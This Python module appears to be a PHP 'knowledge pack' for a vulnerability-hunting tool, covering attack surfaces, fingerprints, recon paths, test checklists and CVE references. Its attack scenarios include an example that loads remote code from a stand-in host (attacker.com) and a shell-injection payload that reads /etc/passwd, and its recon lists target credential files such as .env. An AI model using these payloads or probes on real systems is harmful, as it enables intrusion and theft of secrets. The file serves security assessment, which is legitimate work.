"""PHP Language Knowledge Pack — base runtime for PHP-based frameworks."""

from deephunter.core.types import (
    AttackSurfaceEntry,
    BusinessLogicConcern,
    BugClass,
    ManualTestChecklistItem,
    TrustBoundary,
)
from deephunter.knowledge.packs.base import (
    AttackSurfaceProfile,
    FingerprintProfile,
    KnowledgePack,
    KnowledgePackCategory,
    KnowledgeRelationship,
    KnowledgeRelationshipType,
    ReconProfile,
    TechnologyComponentProfile,
    TechnologyProfile,
)

PACK = KnowledgePack(
    name="php",
    version="1.0.0",
    category=KnowledgePackCategory.LANGUAGE,
    description="PHP — server-side scripting language powering Laravel, Symfony, CodeIgniter, and WordPress. Remote code execution, deserialization attacks, SSRF, file inclusion, and type confusion vulnerabilities.",
    technology=TechnologyProfile(
        name="PHP",
        vendor="The PHP Group",
        language="PHP",
        runtime="PHP 8.x (OPcache, JIT)",
        description="PHP is a general-purpose scripting language especially suited to server-side web development. Runs embedded in HTML or as standalone CLI/daemon. Uses reference counting memory management and a Zend Engine interpreter.",
        common_aliases=["php", "php8", "php7", "zend"],
        dependencies=["PHP runtime", "PHP-FPM", "Composer"],
        common_integrations=["Apache", "Nginx", "PHP-FPM", "Composer", "OPcache", "Xdebug"],
        architecture_description="Zend Engine interprets PHP scripts. Common Gateway Interface (CGI) or PHP-FPM interfaces with web servers. Built-in web server for development. Supports CLI scripts, daemons, and embedded HTML.",
        request_lifecycle="HTTP request -> Web server (Apache/Nginx) -> PHP-FPM/CGI -> PHP interpreter -> Zend Engine -> Script execution -> Output buffering -> Response",
        documentation_url="https://www.php.net/docs.php",
        tags=["php", "server-side", "scripting", "web"],
    ),
    components=[
        TechnologyComponentProfile(
            name="PHP-FPM",
            description="FastCGI Process Manager for PHP. Socket/TCP connection to web server with worker pool management.",
            security_relevance="medium",
            common_vulnerabilities=["FPM socket misconfiguration", "Process pool exhaustion (DoS)", "Environment variable exposure via PHP-FPM admin", "Arbitrary code execution via malformed FastCGI requests"],
            investigation_priority=60,
            tags=["fpm", "fastcgi", "process"],
        ),
        TechnologyComponentProfile(
            name="Composer",
            description="PHP dependency manager. Installing untrusted packages, command injection via scripts, and dependency confusion attacks.",
            security_relevance="high",
            common_vulnerabilities=["Dependency confusion", "Malicious Composer scripts", "Command injection in package scripts", "Untrusted repository packages", "Typosquatting in package names"],
            investigation_priority=80,
            tags=["composer", "dependencies", "supply-chain"],
        ),
        TechnologyComponentProfile(
            name="OPcache",
            description="Bytecode cache for PHP. Speeds up execution by caching precompiled script bytecode. Shared memory storage can leak data between requests.",
            security_relevance="medium",
            common_vulnerabilities=["OPcache poisoning via shared memory", "Information disclosure between tenants", "Cache directory writable by multiple users", "Brute-force against cached bytecode"],
            investigation_priority=50,
            tags=["opcache", "bytecode", "cache"],
        ),
        TechnologyComponentProfile(
            name="Error Handling",
            description="PHP error reporting, exception handling, and stack traces. Verbose errors in production leak internal paths and code structure.",
            security_relevance="high",
            common_vulnerabilities=["Information disclosure via verbose errors", "Stack trace exposure in Whoops handler", "Error messages revealing database queries", "Xdebug exposure in development mode"],
            investigation_priority=80,
            tags=["errors", "debug", "information-disclosure"],
        ),
        TechnologyComponentProfile(
            name="File Upload Handling",
            description="Native PHP $_FILES handling. Direct file move operations, MIME type not validated server-side, path traversal in filenames.",
            security_relevance="high",
            common_vulnerabilities=["Unrestricted file upload", "MIME type spoofing", "Path traversal in filename", "Double extension bypass (.php.jpg)", "Content-type confusion"],
            investigation_priority=85,
            tags=["upload", "file-handling", "rce"],
        ),
        TechnologyComponentProfile(
            name="Deserialization",
            description="PHP serialize/unserialize functions. Magic methods (__wakeup, __destruct, __toString) enable gadget chain attacks and RCE.",
            security_relevance="critical",
            common_vulnerabilities=["PHP object injection via unserialize()", "Magic method gadget chain exploitation", "phar:// deserialization attacks", "ROP-style gadget chains in popular frameworks"],
            investigation_priority=99,
            tags=["deserialization", "unserialize", "rce", "gadget"],
        ),
        TechnologyComponentProfile(
            name="Remote File Inclusion (RFI)",
            description="Including remote PHP scripts via include/require with user-controlled paths. Full RCE when remote script contains PHP code.",
            security_relevance="critical",
            common_vulnerabilities=["RFI leading to RCE", "allow_url_include exploitation", "Null byte injection in paths", "Wrapper abuse (php://, phar://, data://)"],
            investigation_priority=95,
            tags=["rfi", "include", "rce"],
        ),
        TechnologyComponentProfile(
            name="Local File Inclusion (LFI)",
            description="Including local files via user-controlled paths. Combined with PHP wrappers (php://filter, phar://, zip://) can lead to RCE.",
            security_relevance="critical",
            common_vulnerabilities=["LFI to RCE via PHP wrappers", "Log poisoning (/var/log/apache2/access.log)", "Session file poisoning", "proc_open/execution via LFI in temp files"],
            investigation_priority=95,
            tags=["lfi", "include", "rce"],
        ),
        TechnologyComponentProfile(
            name="Command Injection",
            description="exec(), shell_exec(), system(), passthru(), popen(), proc_open() with user input. Also backtick operator and proc_open with shell metacharacters.",
            security_relevance="critical",
            common_vulnerabilities=["Command injection via shell metacharacters", "Argument injection", "Environment variable injection", "PHP wrapper abuse in commands"],
            investigation_priority=99,
            tags=["rce", "command-injection", "os-command"],
        ),
        TechnologyComponentProfile(
            name="Type Juggling",
            description="PHP loose comparison (==) vs strict comparison (===). Type coercion leads to authentication bypass (e.g., '0e123' == '0e456' is true).",
            security_relevance="high",
            common_vulnerabilities=["Type juggling auth bypass", "Hash comparison vulnerabilities", "JSON key integer coercion", "Array to string coercion"],
            investigation_priority=90,
            tags=["type-juggling", "auth-bypass", "comparison"],
        ),
        TechnologyComponentProfile(
            name="SQL Injection",
            description="Direct SQL query construction with user input. PHP MySQL/MySQLi/PDO with unsafe query building.",
            security_relevance="critical",
            common_vulnerabilities=["SQL injection via string interpolation", "Second-order SQL injection", "Boolean-based blind SQLi", "Time-based blind SQLi", "Union-based SQLi"],
            investigation_priority=99,
            tags=["sql-injection", "sqli", "rce"],
        ),
    ],
    attack_surface=AttackSurfaceProfile(
        entry_points=[
            AttackSurfaceEntry(
                name="All PHP Endpoints",
                description="Any .php file accessible via web server",
                protocol="HTTP/HTTPS",
                method="ANY",
                path="/*.php",
                parameters=[],
                authentication_required=False,
                authorization_required=False,
                bug_classes=[b.value for b in BugClass],
            ),
            AttackSurfaceEntry(
                name="CLI Scripts",
                description="PHP command-line scripts potentially accessible via cron, web, or system() calls",
                protocol="CLI",
                method="ANY",
                path="/usr/local/bin/*",
                parameters=[],
                authentication_required=False,
                authorization_required=False,
                bug_classes=[BugClass.COMMAND_INJECTION.value, BugClass.RCE.value],
            ),
            AttackSurfaceEntry(
                name="PHP-FPM Socket",
                description="FastCGI interface between web server and PHP interpreter",
                protocol="FastCGI",
                method="ANY",
                path="N/A (socket)",
                parameters=[],
                authentication_required=False,
                authorization_required=False,
                bug_classes=[BugClass.RCE.value, BugClass.INFO_DISCLOSURE.value],
            ),
        ],
        endpoints=["/*.php", "/index.php", "/info.php", "/phpinfo.php", "/status.php", "/health.php", "/.env"],
        parameters=["id", "page", "limit", "q", "search", "file", "path", "controller", "action", "module", "view", "lang"],
        authentication=["Session cookies", "HTTP Basic Auth", "JWT via PHP libraries", "LDAP auth", "Custom auth"],
        authorization=["Role-based in application code", "Framework ACL", "Custom middleware"],
        storage=["MySQL/MariaDB", "PostgreSQL", "SQLite", "Redis", "Memcached", "Filesystem"],
        background_jobs=["cron", "php daemon", "queue workers"],
        queues=["RabbitMQ", "Beanstalkd", "SQS", "Redis"],
        caches=["Redis", "Memcached", "OPcache", "APC/uAPC"],
        admin_interfaces=["/admin", "/wp-admin", "/administrator", "/backend"],
        internal_apis=["/api/*", "/internal/*"],
        external_apis=["Payment gateways", "SMS providers", "Email services"],
        trust_boundaries=[
            TrustBoundary(name="Web-to-PHP", description="Web server passes request to PHP-FPM", direction="inbound", sensitivity="medium"),
            TrustBoundary(name="PHP-to-DB", description="PHP scripts query database", direction="outbound", sensitivity="high"),
            TrustBoundary(name="PHP-to-FS", description="PHP reads/writes filesystem", direction="bidirectional", sensitivity="high"),
        ],
        attack_surface_areas=[
            "Remote code execution via deserialization",
            "Local/Remote file inclusion to RCE",
            "Command injection in exec() calls",
            "SQL injection in query building",
            "Type juggling authentication bypass",
            "File upload leading to web shell",
            "PHP wrapper abuse (php://, phar://, zip://, data://)",
            "SSRF via file_get_contents/curl with user URL",
            "Path traversal in include/require/fopen",
            "Server-side template injection in PHP templates",
            "XSS via unescaped output",
            "Session fixation/hijacking",
            "Environment variable exposure",
            "OPcache poisoning between tenants",
        ],
        investigation_areas=[
            "Test unserialize() for object injection",
            "Probe LFI/RFI with PHP wrappers (php://filter, phar://, zip://)",
            "Test exec(), shell_exec(), system() for command injection",
            "Check for SQL injection in raw queries",
            "Test type juggling with loose comparisons (==)",
            "Check file upload for double extensions and MIME bypass",
            "Probe SSRF via file_get_contents/curl with user-controlled URLs",
            "Test path traversal in include/require",
            "Check error handling for stack trace exposure",
            "Test PHP-FPM socket for arbitrary code execution",
            "Check Composer for supply chain vulnerabilities",
        ],
        tags=["php", "language", "server-side"],
    ),
    fingerprints=FingerprintProfile(
        http_headers={
            "X-Powered-By": "PHP",
            "Server": "Apache/Nginx with PHP",
        },
        cookies=["PHPSESSID", "phpbb3_"],
        js_indicators=["<?php", "<?=", "laravel", "wordpress", "drupal", "joomla", "codeigniter"],
        file_indicators=["index.php", "wp-config.php", ".env", "composer.json", "vendor/autoload.php", "public/index.php", "artisan", "console"],
        directory_indicators=["/vendor/", "/app/", "/public/", "/html/", "/htdocs/", "/wp-content/", "/administrator/"],
        server_signatures=["PHP", "Zend", "X-Powered-By"],
        error_page_signatures=["Parse error", "Fatal error", "Warning:", "Notice:", "PHP Warning", "PHP Notice", "PHP Fatal error", "Zend Engine", "stack trace:", "thrown in"],
        default_paths=["/index.php", "/info.php", "/phpinfo.php", "/status.php", "/health.php", "/admin.php", "/login.php"],
        default_files=["index.php", "php.ini", ".htaccess", "composer.json", "artisan", "wp-config.php", ".env"],
        metadata_patterns={"generator": "PHP", "php": "pattern: PHP/[0-9]\\.[0-9]"},
        tags=["fingerprint", "php", "language"],
    ),
    recon=ReconProfile(
        directories_to_check=["/vendor/", "/public/", "/app/", "/html/", "/htdocs/", "/wp-content/", "/administrator/", "/storage/", "/bootstrap/cache/"],
        files_to_check=[".env", "composer.json", "composer.lock", "php.ini", ".htaccess", "wp-config.php", "config.php", "database.php", ".gitignore"],
        endpoints_to_scan=["/*.php", "/index.php", "/admin.php", "/login.php", "/xmlrpc.php", "/wp-login.php"],
        version_detection_paths=["/composer.json", "/phpinfo.php", "/?id=1"],
        debug_paths_to_check=["/phpinfo.php", "/info.php", "/?debug=1", "/?q=info"],
        admin_paths_to_check=["/admin", "/wp-admin", "/administrator", "/backend", "/manage"],
        tags=["recon", "php", "language"],
    ),
    business_logic_concerns=[
        BusinessLogicConcern(
            description="PHP unserialize() with user input allows object injection and potentially RCE via magic method gadget chains",
            impact="Full remote code execution on the server",
            attack_scenario="Craft a serialized PHP object with a malicious __destruct() or __wakeup() method that writes an eval() call, then pass it to unserialize()",
            complexity="medium",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="RFI via include() with user-controlled path allows remote code execution when allow_url_include is enabled",
            impact="Full RCE by including a remote PHP script",
            attack_scenario="Set include parameter to http://attacker.com/shell.txt containing PHP code",
            complexity="low",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="LFI combined with PHP wrappers (phar://, zip://) or log poisoning can achieve RCE",
            impact="RCE from LFI via file upload or log poisoning",
            attack_scenario="Upload a PHAR archive containing a malicious __destruct(), then trigger deserialization via phar:// wrapper",
            complexity="medium",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="Command injection in exec()/shell_exec()/system() with user input allows OS-level RCE",
            impact="Full OS-level command execution on server",
            attack_scenario="Pass user input containing shell metacharacters (; cat /etc/passwd) to exec()",
            complexity="low",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="Type juggling in loose comparisons (==) allows authentication bypass",
            impact="Authentication bypass, accessing other users' accounts",
            attack_scenario="Use password hash starting with 0e... compared with 0e... which PHP treats as equal",
            complexity="low",
            requires_authentication=False,
        ),
    ],
    relationships=[
        KnowledgeRelationship(
            target_pack_name="mysql",
            relationship_type=KnowledgeRelationshipType.STORES_DATA_IN,
            description="PHP commonly connects to MySQL via mysqli or PDO_MySQL",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="nginx",
            relationship_type=KnowledgeRelationshipType.PROXIED_BY,
            description="Nginx commonly serves PHP applications via PHP-FPM",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="apache",
            relationship_type=KnowledgeRelationshipType.RUNS_ON,
            description="Apache with mod_php or PHP-FPM runs PHP applications",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="redis",
            relationship_type=KnowledgeRelationshipType.CACHES_WITH,
            description="PHP uses Redis for session storage and caching",
            confidence="medium",
        ),
    ],
    dependencies=["PHP 8.x", "Composer", "PHP-FPM"],
    related_packs=["laravel", "wordpress", "drupal", "symfony", "magento", "mysql", "nginx", "apache"],
    workflow=[
        "1. Identify PHP via X-Powered-By header and .php file extensions",
        "2. Check if allow_url_include is enabled (RFI)",
        "3. Test unserialize() entry points for PHP object injection",
        "4. Probe for LFI and test with PHP wrappers (php://filter, phar://, zip://)",
        "5. Test command injection in exec()/shell_exec()/system() calls",
        "6. Check for SQL injection in raw SQL queries",
        "7. Test type juggling by comparing hashed values",
        "8. Probe file upload for double extension and MIME bypass",
        "9. Check error handling for stack trace exposure",
        "10. Test SSRF via file_get_contents/curl with user-controlled URLs",
        "11. Check .env for database credentials and secrets",
    ],
    checklists=[
        ManualTestChecklistItem(
            step_id="PHP-01",
            category="Deserialization",
            description="Test unserialize() entry points for PHP object injection",
            expected_result="Server must reject serialized objects from untrusted sources or use JSON instead of PHP serialize()",
            tools=["phpggc", "PHP Object Injection PoC", "custom scripts"],
            references=["https://www.php.net/manual/en/function.unserialize.php", "https://www.owasp.org/www-community/vulnerabilities/PHP_Object_Injection"],
        ),
        ManualTestChecklistItem(
            step_id="PHP-02",
            category="Command Injection",
            description="Test exec/shell_exec/system/passthru/popen for command injection",
            expected_result="User input must be escaped or parameterized; shell metacharacters must be blocked",
            tools=["Burp Suite", "commix", "custom scripts"],
            references=["https://www.php.net/manual/en/book.exec.php"],
        ),
        ManualTestChecklistItem(
            step_id="PHP-03",
            category="File Inclusion",
            description="Test LFI/RFI with PHP wrappers for RCE",
            expected_result="User input must not reach include/require/fopen without strict validation",
            tools=["Burp Suite", "ffuf", "LFISuite"],
            references=["https://www.php.net/manual/en/function.include.php"],
        ),
        ManualTestChecklistItem(
            step_id="PHP-04",
            category="Type Juggling",
            description="Test authentication for type juggling vulnerabilities",
            expected_result="Must use strict comparison (===) and type-safe functions",
            tools=["custom scripts", "Burp Suite"],
            references=["https://www.owasp.org/www-project-web-security-testing-guide/"],
        ),
        ManualTestChecklistItem(
            step_id="PHP-05",
            category="SSRF",
            description="Test file_get_contents and curl functions for SSRF",
            expected_result="URLs must be validated against an allowlist and not follow redirects by default",
            tools=["Burp Suite", "SSRFmap"],
            references=["https://www.php.net/manual/en/function.file-get-contents.php"],
        ),
    ],
    references=[
        {"title": "PHP Documentation", "url": "https://www.php.net/docs.php"},
        {"title": "OWASP PHP Security Cheat Sheet", "url": "https://cheatsheetseries.owasp.org/cheatsheets/PHP_Security_Cheat_Sheet.html"},
        {"title": "PHP Object Injection", "url": "https://www.owasp.org/www-community/vulnerabilities/PHP_Object_Injection"},
        {"title": "Gynvael's PHP Hacking", "url": "https://gynvael.coldwind.pl/"},
        {"title": "CVE PHP Collection", "url": "https://www.cve.org/KeywordSearch?keyword=PHP"},
    ],
    cwe_ids=["CWE-502", "CWE-78", "CWE-89", "CWE-94", "CWE-200", "CWE-22", "CWE-287", "CWE-435", "CWE-344", "CWE-601", "CWE-79"],
    cve_ids=["CVE-2021-3129", "CVE-2022-31625", "CVE-2022-31626", "CVE-2020-7069", "CVE-2019-11043"],
    tags=["php", "language", "server-side", "rce"],
)